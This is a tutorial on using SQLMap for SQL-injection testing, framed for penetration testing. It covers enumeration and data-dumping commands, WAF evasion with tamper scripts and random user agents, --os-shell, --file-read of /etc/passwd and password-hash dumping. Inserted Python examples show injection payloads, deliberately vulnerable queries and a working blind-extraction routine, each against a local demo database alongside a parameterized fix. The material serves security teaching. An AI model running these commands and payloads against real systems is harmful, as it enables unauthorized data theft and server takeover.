SQLMap: A Guide on How to Use This Powerful Tool for Automated SQL Injections

02.09.2024

If you're an ethical hacker passionate about cybersecurity, you've likely used, or at least heard of, SQLMap, a robust tool for automating SQL injection testing. That is what we're here to discuss today. If the topic interests you, welcome to this step-by-step guide on how to use SQLMap to carry out SQLi tests during your pentests.

Without further ado, let's get straight to the point!

Introduction: What's SQLMap

SQLMap is an open-source penetration testing tool designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications. First released in 2006, SQLMap quickly became a go-to tool for cybersecurity professionals due to its powerful features and ease of use.

Written in Python, SQLMap is cross-platform, meaning it can run on various operating systems, including Windows, Linux, and macOS. This versatility makes it accessible to a wide range of users, from beginners to seasoned ethical hackers.

SQLMap's capabilities extend beyond just detecting vulnerabilities. It can also exploit them, allowing testers to extract data, modify databases, or even execute commands on the underlying operating system in certain scenarios. Its extensive range of options and automation features make it a vital tool for conducting thorough security assessments, ensuring that web applications are robust against SQL injection attacks.

Understanding SQL and Database Structure

SQL (Structured Query Language) is a standard language used to interact with relational databases. It allows users to perform various operations such as querying data, updating records, and managing database structures.

A relational database is composed of several elements:

  • Database: The top-level container for all data. A database holds multiple tables and is used to store and manage data efficiently.

  • Table: Within a database, tables organize data into rows and columns. Each table is designed to hold a specific type of information, such as user data or product details. Tables are similar to spreadsheets, where each table represents a different entity.

  • Column: Columns define the type of data stored in a table. Each column has a specific data type (e.g., integer, text, date) and a name that represents the kind of information it holds, such as "username" or "price."

  • Row (data): Rows represent individual records within a table. Each row contains data for each column in the table. For example, in a "users" table, a row might contain specific information like a username, email address, and registration date for a single user. In essence, rows hold the actual data entries corresponding to each column in the table.
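To make the hierarchy concrete, here is an added example (my own code, not from the original page). It builds a one-table SQLite database in memory, walks database, table, columns and rows programmatically the way SQLMap's enumeration options do, and shows why SQLMap exists at all: the same lookup written with string concatenation and with a bound parameter. The users table, its contents and the find_user functions are constructed for illustration; SQLite stands in for MySQL or PostgreSQL so the script runs offline.

```python
import sqlite3

# Constructed sample schema: one table ("users") with four typed columns and
# three rows. SQLite is used so the example runs offline; the same hierarchy
# applies to MySQL, PostgreSQL or MSSQL.
SCHEMA = """
CREATE TABLE users (
    id         INTEGER PRIMARY KEY,
    username   TEXT NOT NULL,
    email      TEXT NOT NULL,
    registered DATE
);
INSERT INTO users (username, email, registered) VALUES
    ('alice', 'alice@example.com', '2024-01-10'),
    ('bob',   'bob@example.com',   '2024-02-03'),
    ('carol', 'carol@example.com', '2024-03-15');
"""


def new_db():
    """Create a fresh in-memory database holding the sample table."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def describe(db):
    """Walk the hierarchy the way --tables/--columns/--dump would: every table,
    its column names and its row count. Table names come from the catalogue,
    not from user input, so interpolating them into the query here is safe."""
    layout = {}
    for (table,) in db.execute("SELECT name FROM sqlite_master WHERE type='table'"):
        columns = [col[1] for col in db.execute("PRAGMA table_info(%s)" % table)]
        rows = db.execute("SELECT COUNT(*) FROM %s" % table).fetchone()[0]
        layout[table] = {"columns": columns, "rows": rows}
    return layout


def find_user_vulnerable(db, username):
    """Deliberately vulnerable: the value is pasted into the SQL text, so a
    quote in the input ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT id, username, email FROM users WHERE username = '" + username + "'"
    return db.execute(sql).fetchall()


def find_user_safe(db, username):
    """Hardened form: the driver binds the value; it is never parsed as SQL."""
    sql = "SELECT id, username, email FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    db = new_db()
    print(describe(db))
    payload = "' OR '1'='1"                    # classic authentication-bypass payload
    print(find_user_vulnerable(db, payload))   # every row comes back
    print(find_user_safe(db, payload))         # no row: nobody has that literal name
```

Running the script prints the table layout, then three rows for the vulnerable lookup and none for the safe one. A union payload such as `' UNION SELECT 1, sqlite_version(), 'x' --` against the vulnerable function returns the database version in the username column, which is exactly what SQLMap's union technique automates; the parameterized version returns nothing for it either. The fix that SQLMap's findings always point at is the second form: bind values, never concatenate them.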

Part 1: How to install SQLMap

Installation depends on the operating system, but in general you install Python first, then clone or download the repository from GitHub (https://github.com/sqlmapproject/sqlmap), change into the project directory in a terminal and run the tool with "python sqlmap.py", or "python sqlmap.py -h" for the help text.

This article is for everyone, but especially for Linux users, and on Debian-based distributions such as Kali or Ubuntu SQLMap can be installed with apt: "sudo apt update && sudo apt install -y sqlmap". To run the tool, simply type "sqlmap" or "sqlmap -h", and you're done. Keep in mind that the packaged version can be older than the Git repository, which receives frequent updates; a repository copy can update itself with "python sqlmap.py --update".

Part 2: Basic Usages of SQLMap

SQLMap offers a range of powerful features to test for and exploit SQL injection vulnerabilities. Here are some basic commands and options to get you started:

  • 1. Basic Command Structure: To test every parameter of a URL (for example https://example.com/page.php?id=1), use:
  • sqlmap -u [URL]
  • 2. Specifying Parameters: To send parameters in a POST body, use --data; to restrict the test to specific parameters instead of all of them, add -p:
  • sqlmap -u [URL] --data "param1=value1&param2=value2" -p param1
  • 3. Enumerating Databases: Once an injection has been found (SQLMap saves it in a session file under its output directory, so the following commands reuse it instead of testing again), to list the databases, use:
  • sqlmap -u [URL] --dbs
  • 4. Enumerating Tables: To enumerate the tables within a specific database, use:
  • sqlmap -u [URL] -D [database] --tables
  • 5. Enumerating Columns: To enumerate the columns within a specific table, use:
  • sqlmap -u [URL] -D [database] -T [table] --columns
  • 6. Extracting (Dumping) Data: To extract data from one or more columns of a table (separate several columns with ","), use:
  • sqlmap -u [URL] -D [database] -T [table] -C [column1,column2] --dump

Part 3: Special or Additional Usages of SQLMap

SQLMap offers a wide range of advanced features beyond basic SQL injection testing. Here are some special or additional usages that can enhance your testing and exploitation capabilities:

1. Advanced SQL Injection Detection

  • Different Injection Techniques: SQLMap supports several SQL injection techniques, selected with the --technique parameter. Each technique is one letter: B (Boolean-based blind), E (Error-based), U (Union query-based), S (Stacked queries), T (Time-based blind) and Q (inline Queries). --technique=BEUSQT therefore enables all six, which is also the default, so the option is mainly useful to restrict a run, for example --technique=BT when only the blind techniques are wanted.

  • Level of Testing: The --level parameter (1 to 5, default 1) adjusts how many payloads are tried and which inputs are tested. Level 2 adds the Cookie header, level 3 adds the User-Agent and Referer headers, and the higher levels add more payload variations. Raising it can uncover injection points the default misses, but the run takes noticeably longer.

  • Custom HTTP Headers: To send extra HTTP headers, use the --headers parameter, for instance --headers="X-Custom-Header: value"; several headers are separated with "\n". A single header can also be given with -H.
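What "Boolean-based blind" means in practice, as an added example that is not part of the original article: a constructed, deliberately vulnerable page function stands in for https://example.com/page.php?id=1, and the detector below does what SQLMap's technique B does, with a safe version of the same page to confirm the check stays negative. It then extracts a value one character at a time through the true/false oracle, which is why blind injection is so much slower than union- or error-based extraction. The table contents, page strings and function names are assumptions made for the demo, and SQLite stands in for the real back-end.

```python
import sqlite3

# Constructed back-end for the demo: one table, two rows, one secret to steal.
_DB = sqlite3.connect(":memory:")
_DB.executescript("""
    CREATE TABLE users (id INTEGER, username TEXT, secret TEXT);
    INSERT INTO users VALUES (1, 'alice', 'S3cr3t');
    INSERT INTO users VALUES (2, 'bob',   'hunter2');
""")


def _render(row):
    if row:
        return "<html>User: %s</html>" % row[0]
    return "<html>No such user</html>"


def vulnerable_page(id_param):
    """Stands in for page.php?id=...: the parameter is concatenated into the query."""
    try:
        row = _DB.execute("SELECT username FROM users WHERE id=" + id_param).fetchone()
    except sqlite3.Error:
        return "<html>Internal Server Error</html>"
    return _render(row)


def safe_page(id_param):
    """Same page with a bound parameter; the input can never change the query."""
    row = _DB.execute("SELECT username FROM users WHERE id=?", (id_param,)).fetchone()
    return _render(row)


def is_boolean_blind_injectable(page, base="1"):
    """Technique B: a TRUE condition must leave the page unchanged and a FALSE
    one must change it. sqlmap uses a similarity ratio instead of equality so
    that timestamps and other dynamic content do not fool the comparison."""
    original = page(base)
    return page(base + " AND 1=1") == original and page(base + " AND 1=2") != original


def blind_extract(page, expression, base="1", max_len=64):
    """Read the result of `expression` (a scalar subquery) through the oracle,
    one character per binary search over the ASCII range. Returns the value
    and the number of requests it cost."""
    original = page(base)
    value, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                  # assumes an ASCII result
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "%s AND unicode(substr((%s),%d,1))>%d" % (base, expression, pos, mid)
            requests += 1
            if page(probe) == original:  # condition TRUE: the character is above mid
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                      # substr() past the end gives '' -> NULL -> FALSE
            break
        value += chr(lo)
    return value, requests


if __name__ == "__main__":
    print("vulnerable:", is_boolean_blind_injectable(vulnerable_page))   # True
    print("safe:      ", is_boolean_blind_injectable(safe_page))         # False
    secret, cost = blind_extract(vulnerable_page, "SELECT secret FROM users WHERE username='bob'")
    print("extracted %r in %d requests" % (secret, cost))
```

Seven characters cost roughly fifty requests here, and a real target adds network latency to every one of them; that is the price of a blind technique, and the reason SQLMap prefers error- or union-based extraction whenever the page leaks query output directly. Against the parameterized version the oracle never fires, so the detector reports nothing and the extraction returns an empty string.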

2. Bypassing WAFs and Filters

  • Randomized User-Agent String: By default SQLMap identifies itself with a User-Agent such as sqlmap/1.x, which many web application firewalls (WAFs) block outright. The --random-agent parameter replaces it with a browser User-Agent picked at random from SQLMap's bundled list, one per run, which gets past that simple check; a WAF that inspects the payloads themselves needs the tamper scripts described below.

  • Proxy Usage: To route SQLMap's traffic through a proxy, use the --proxy parameter, for example --proxy="http://127.0.0.1:8080" (HTTP, HTTPS, SOCKS4 and SOCKS5 proxies are supported). Besides anonymization, this is the easiest way to watch and debug every request in an interception proxy such as Burp Suite.

3. Database Management and OS Command Execution

  • OS Command Execution: When the injection allows it, --os-shell gives an interactive command prompt on the database server and --os-cmd="id" runs a single command. This only works under specific conditions: for example, stacked queries and xp_cmdshell on Microsoft SQL Server, or on MySQL a database user with the FILE privilege plus a writable, web-reachable directory into which SQLMap can upload a web shell. SQLMap asks for the missing details (such as the web root) when it needs them.

  • File System Access: The --file-read parameter reads files from the server's file system, for instance --file-read="/etc/passwd" on a Unix-like system, and --file-write together with --file-dest uploads a local file to a remote path. Both need database-level file privileges (on MySQL, the FILE privilege and a secure_file_priv setting that allows it).

4. User and Privilege Enumeration

  • Enumerate Users and Privileges: --current-user shows the account the application connects with and --is-dba tells you whether it has administrative rights. --users lists the database users, --privileges and --roles their privileges and roles, and --passwords retrieves their password hashes (not clear-text passwords); SQLMap then offers to crack the hashes with a dictionary attack.

5. Customizing the Attack

  • Specify Database System: To skip fingerprinting and tailor the payloads to a known back-end, use the --dbms parameter, for example --dbms=MySQL or --dbms=PostgreSQL.

  • Custom SQL and Payloads: Once an injection point is confirmed, --sql-query="SELECT * FROM users WHERE id=1" runs a statement of your own through it and --sql-shell opens an interactive SQL prompt. To adapt the injected payloads to the surrounding query's syntax, --prefix and --suffix add fixed strings before and after each payload, for example --prefix="')" --suffix="-- " when the parameter sits inside a parenthesised, quoted string.

These advanced features provide greater control and flexibility when performing penetration tests with SQLMap. For a comprehensive list of options and further details, refer to the SQLMap documentation or use the help command.

6. Tamper Scripts

Tamper scripts are small Python modules, found in SQLMap's tamper/ directory, that rewrite each payload just before it is sent. They exist to slip past web application firewalls (WAFs) and input validation filters that match on fixed patterns. Here are two common ones:

  • space2comment: Replaces the spaces in a payload with an empty SQL comment, /**/, which the database parser treats as whitespace. This defeats filters that look for keywords separated by spaces. For example, SELECT id FROM users becomes SELECT/**/id/**/FROM/**/users.

  • charencode: URL-encodes every character of the payload (already-encoded %XX sequences are left alone). For example, SELECT 1 becomes %53%45%4C%45%43%54%20%31. The web server decodes this before the value reaches the database, so it only evades filters that inspect the raw request rather than the decoded parameter.

To use tamper scripts, you can specify them with the --tamper parameter. For instance, using both space2comment and charencode scripts together would look like this:

--tamper=space2comment,charencode

Part 4: A Complete Example Command for a Better Attack with SQLMap

Personally, I often use the following command for performing SQL injections with SQLMap. This command is highly customizable for various sites and can be tailored to specific needs:
  • sqlmap -u [URL] --technique=BEUSQT --tamper=space2comment,charencode --level=5 --risk=3 --random-agent --dbs

Explanation of Each Parameter:

  • -u [URL]: Replace [URL] with the target URL containing the SQL injection vulnerability. For example, https://example.com/page.php?id=1

  • --technique=BEUSQT: Specifies the injection techniques to use: Boolean-based blind, Error-based, Union query-based, Stacked queries, inline Queries and Time-based blind. That is every technique SQLMap implements, so the value is equivalent to the default; it is listed here to make the choice explicit.

  • --tamper=space2comment,charencode: Applies tamper scripts to each payload. space2comment replaces spaces with /**/ comments and charencode URL-encodes the result, to get past simple pattern-matching filters.

  • --level=5: Sets the level of tests to perform. A higher level means more thorough testing but may increase time and complexity. Level 5 is quite exhaustive.

  • --risk=3: Defines the risk of the tests (1 to 3, default 1). Level 2 adds heavy time-based queries and level 3 adds OR-based boolean tests, which can modify or delete rows if the injection point sits in an UPDATE or DELETE statement. Use the highest level only where that side effect is acceptable.

  • --random-agent: Replaces the default sqlmap/1.x User-Agent with a random browser one for the run, so that web application firewalls (WAFs) cannot block the scan on the User-Agent alone.

  • --dbs: Lists all databases on the target server, providing an overview of the database structure.

  • --batch: Not part of the command above; I don't use this option all the time, but if you need to run the attack without manually answering prompts, it takes the default answer to every question SQLMap asks. That is useful when you can't monitor the run or need it unattended, at the cost of letting SQLMap decide for you.

This command covers a broad range of techniques and configurations to perform a thorough and effective SQL injection test. Adjust parameters as needed based on the specific site and testing requirements.

BONUS

I made a Python Script to automate all that we've seen in this guide.

You can test it here: AutoSQLMap Script

Conclusion

In this guide, we've explored several key aspects of SQLMap, including its installation, basic usage, and advanced features such as tamper scripts and custom configurations. We've seen how to effectively leverage parameters like --technique, --tamper, --level, and --risk to tailor your SQL injection attacks and enhance your security assessments.

However, it's important to note that SQLMap is a complex and versatile tool with many more features and options beyond what we've covered here. The world of SQL injection and automated testing is vast, and SQLMap offers an extensive range of capabilities that are impossible to fully explain in a single article.

There's always more to learn and discover, so I encourage you to delve deeper into SQLMap's documentation, experiment with different features, and stay updated with the latest developments in the field of cybersecurity. By continuing to explore and practice, you'll gain a deeper understanding of SQLMap and its potential, ultimately improving your skills and effectiveness in penetration testing.

Copyright © 2024
